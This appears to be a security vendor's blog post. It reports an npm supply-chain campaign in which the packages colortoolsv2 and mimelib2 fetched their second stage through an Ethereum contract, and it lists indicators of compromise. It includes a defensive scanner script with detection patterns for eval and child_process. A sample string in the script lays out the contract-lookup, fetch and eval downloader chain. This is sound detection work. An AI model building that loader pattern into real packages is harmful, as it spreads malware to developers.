Cybersecurity researchers have uncovered a software supply chain attack that abused the npm ecosystem and used Ethereum smart contracts to hide where its malicious payload was hosted. The campaign, which spanned both npm and GitHub, shows how quickly the tactics of threat actors targeting developers and cryptocurrency communities are evolving.
How the Attack Unfolded
In July 2025, researchers at ReversingLabs identified two malicious npm packages, colortoolsv2 and mimelib2, that used Ethereum smart contracts to deliver downloader malware.
- colortoolsv2 was first published on July 7, 2025.
- mimelib2, an almost identical replacement, appeared later that month after the first package was flagged and removed.
Once a project installed and loaded either package, an obfuscated payload in its index.js ran. Instead of embedding a hardcoded command-and-control (C2) URL, the code queried a smart contract on the Ethereum blockchain and read from it the URL of the server hosting the next stage, a technique rarely seen before in npm attacks. Because the contract is only a lookup, the package itself never contains the hosting server's address, and a scanner that looks for hardcoded URLs finds none.
The downloader then fetched the second-stage malware from that URL and ran it on the victim's system, giving the attackers persistence and control.
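The retrieval chain described above (a contract read, a fetch of the URL it returns, execution of the result) leaves a recognisable footprint in package source even though the C2 URL never appears in it. The scanner below is added here as an illustration; it is not code from the original report or from ReversingLabs. It applies that footprint as heuristics to an unpacked package: lifecycle hooks in package.json, blockchain-client or contract-call references, download and dynamic-execution primitives, base64/hex obfuscation, and a match against the contract address listed in the IoC section of this page. The rule set, the weights, the threshold and both sample packages are constructed assumptions for this example; the "suspicious" sample only mimics the shape of the downloader as text, and nothing in it is executed, since the scanner only reads strings.

```javascript
'use strict';

// Contract address from this page's IoC list; matching it is a high-confidence hit.
const KNOWN_BAD_CONTRACTS = new Set([
  '0x1f117a1b07c108eae05a5bccbe86922d66227e2b',
]);

// Heuristic rules over JavaScript source text. The weights and the threshold
// below are assumptions for this example, not a published scoring scheme.
const SOURCE_RULES = [
  { id: 'eth-contract-call', weight: 3, re: /\b(ethers|web3|viem)\b|\.Contract\s*\(|eth_call/ },
  { id: 'eth-address-literal', weight: 1, re: /\b0x[0-9a-fA-F]{40}\b/ },
  { id: 'dynamic-exec', weight: 3, re: /\beval\s*\(|new\s+Function\s*\(|child_process/ },
  { id: 'remote-fetch', weight: 2, re: /\bfetch\s*\(|https?\.get\s*\(|\baxios\b/ },
  { id: 'obfuscation', weight: 2,
    re: /(\\x[0-9a-fA-F]{2}){6,}|Buffer\.from\s*\([^,()]+,\s*['"]base64['"]\s*\)|[A-Za-z0-9+/]{120,}={0,2}/ },
];
const SUSPICIOUS_THRESHOLD = 8;
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// files: map of relative path -> file text for one unpacked package.
// Returns { score, verdict, findings } without executing any of the content.
function scanPackage(files) {
  const findings = [];
  if (typeof files['package.json'] === 'string') {
    let pkg = null;
    try {
      pkg = JSON.parse(files['package.json']);
    } catch {
      findings.push({ id: 'unparseable-package-json', weight: 1, file: 'package.json', detail: '' });
    }
    const scripts = (pkg && pkg.scripts) || {};
    for (const hook of LIFECYCLE_HOOKS) {
      if (scripts[hook]) {
        findings.push({ id: `lifecycle:${hook}`, weight: 2, file: 'package.json', detail: scripts[hook] });
      }
    }
  }
  for (const [file, text] of Object.entries(files)) {
    if (!/\.[cm]?js$/.test(file)) continue;
    for (const rule of SOURCE_RULES) {
      const m = rule.re.exec(text);
      if (m) findings.push({ id: rule.id, weight: rule.weight, file, detail: m[0].slice(0, 40) });
    }
    for (const addr of text.match(/\b0x[0-9a-fA-F]{40}\b/g) || []) {
      if (KNOWN_BAD_CONTRACTS.has(addr.toLowerCase())) {
        findings.push({ id: 'ioc:contract-address', weight: 10, file, detail: addr });
      }
    }
  }
  const score = findings.reduce((sum, f) => sum + f.weight, 0);
  const ids = new Set(findings.map((f) => f.id));
  // The combination that characterises this campaign: an on-chain lookup
  // feeding a download step whose result is then executed.
  const chainLookupChain =
    ids.has('eth-contract-call') && ids.has('remote-fetch') && ids.has('dynamic-exec');
  const verdict = score >= SUSPICIOUS_THRESHOLD || chainLookupChain ? 'suspicious' : 'clean';
  return { score, verdict, findings };
}

// Constructed sample 1: a benign colour helper with no install hooks.
const BENIGN = {
  'package.json': JSON.stringify({ name: 'color-utils', version: '1.0.0', main: 'index.js' }),
  'index.js':
    "module.exports.hex = (r, g, b) => '#' + [r, g, b].map((v) => v.toString(16).padStart(2, '0')).join('');\n",
};

// Constructed sample 2: text that mimics the shape of the downloader described
// on this page (contract read -> URL -> fetch -> eval). Placeholders only; the
// scanner never evaluates it.
const SUSPICIOUS = {
  'package.json': JSON.stringify({
    name: 'colortoolsv2', version: '1.0.2', main: 'index.js', scripts: { postinstall: 'node index.js' },
  }),
  'index.js': [
    "const { ethers } = require('ethers');",
    "const { execSync } = require('child_process');",
    "const c = new ethers.Contract('0x1f117a1b07c108eae05a5bccbe86922d66227e2b', abi, provider);",
    "c.getString().then((u) => fetch(u)).then((r) => r.text()).then((s) => eval(Buffer.from(s, 'base64').toString()));",
  ].join('\n'),
};

for (const [name, files] of [['benign', BENIGN], ['suspicious', SUSPICIOUS]]) {
  const r = scanPackage(files);
  console.log(`${name}: ${r.verdict} (score ${r.score}) ${r.findings.map((f) => f.id).join(', ')}`);
}
```

Run it with `node scan.js` on the two constructed samples, or feed `scanPackage` the files from `npm pack` output after extracting the tarball. The individual rules are noisy on their own (plenty of honest packages use `fetch` or `child_process`); the value is in the combination, which is why the verdict also triggers on the lookup-fetch-execute chain regardless of score.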
Expanding the Campaign
Investigators uncovered a broader campaign that went beyond npm. Threat actors maintained a network of fraudulent GitHub repositories, including:
- solana-trading-bot-v2
- ethereum-mev-bot-v2
- arbitrage-bot
- hyperliquid-trading-bot
These repositories were designed to look legitimate: thousands of fake commits, stars and watchers inflated by bogus accounts, and multiple puppet maintainer accounts to mimic an active project.
The goal was to trick developers, particularly in the cryptocurrency sector, into trusting these projects and pulling in the malicious npm packages they depended on.
Indicators of Compromise (IoCs)
| Package | Version | SHA1 |
| --- | --- | --- |
| colortoolsv2 | 1.0.0 | 678c20775ff86b014ae8d9869ce5c41ee06b6215 |
| colortoolsv2 | 1.0.1 | 1bb7b23f45ed80bce33a6b6e6bc4f99750d5a34b |
| colortoolsv2 | 1.0.2 | db86351f938a55756061e9b1f4469ff2699e9e27 |
| mimelib2 | 1.0.0 | bda31e9022f5994385c26bd8a451acf0cd0b36da |
| mimelib2 | 1.0.1 | c5488b605cf3e9e9ef35da407ea848cf0326fdea |
- Second-stage payload SHA1: 021d0eef8f457eb2a9f9fb2260dd2e391f009a21
- Smart contract address: 0x1f117a1b07c108eae05a5bccbe86922d66227e2b
Why This Matters
This campaign represents a new frontier in software supply chain attacks. By using a smart contract, immutable and decentralized by nature, as the lookup for their hosting server, the attackers made blocking and takedown far harder: the contract address cannot be removed from the chain, and the attackers can update the URL it returns with a new transaction, so taking down any single hosting server does not break the infection chain. The practical lever for defenders is therefore the build and developer environment itself: restrict outbound network access from CI and build hosts, and treat a package that contacts public blockchain RPC endpoints at install or load time as suspect.
The campaign also leveraged social engineering at scale, using fake developer activity to lure victims into false trust. Cryptocurrency-focused developers were the primary target, but the techniques could easily be adapted to other industries.
How Our Services Can Help
At CyberTech Nexus, we recognize that modern cyber threats are increasingly blending technical exploits with deception tactics. Here’s how our services can protect organizations and individuals against such evolving risks:
- IT & Cybersecurity Consultancy – Strategic guidance to design resilient development and deployment environments resistant to supply chain compromises.
- Security Audits & Vulnerability Assessments – Deep code and dependency reviews to identify risks in open-source libraries before integration.
- Incident Response & Recovery – Rapid containment, eradication, and recovery in case of compromise from malicious packages.
- Managed Security Services (MSS) – Continuous monitoring of repositories, endpoints, and blockchain interactions to detect emerging threats.
- Penetration Testing – Simulating supply chain attacks, including npm and GitHub compromise scenarios, to assess organizational preparedness.
- Compliance & Regulatory Services – Aligning with frameworks such as NIST SSDF and GDPR to strengthen software supply chain security.
- Cyber Protection Academy – Training developers and teams to identify malicious packages, fake repositories, and signs of tampering.
- Cybersecurity Recruitment Services – Helping businesses build teams equipped with the right skills to mitigate complex, evolving attacks.
Conclusion
This npm campaign demonstrates how attackers are weaponizing blockchain technology in unexpected ways to evade detection. By combining technical innovation with social engineering, they continue to blur the lines between legitimate development ecosystems and malicious operations.
Organizations and individuals alike must adopt a multi-layered cybersecurity approach, one that includes regular audits, dependency validation, user awareness, and rapid incident response to stay ahead of these threats.
At CyberTech Nexus, we stand ready to protect your digital ecosystem from today’s most sophisticated cyber threats.
References
- ReversingLabs. Ethereum Smart Contracts Used in npm Supply Chain Attack.
- The Hacker News. Malicious npm Packages Abuse Blockchain to Deliver Malware.
- Ethereum Foundation. Smart Contracts Documentation.
- CISA. Software Supply Chain Guidance.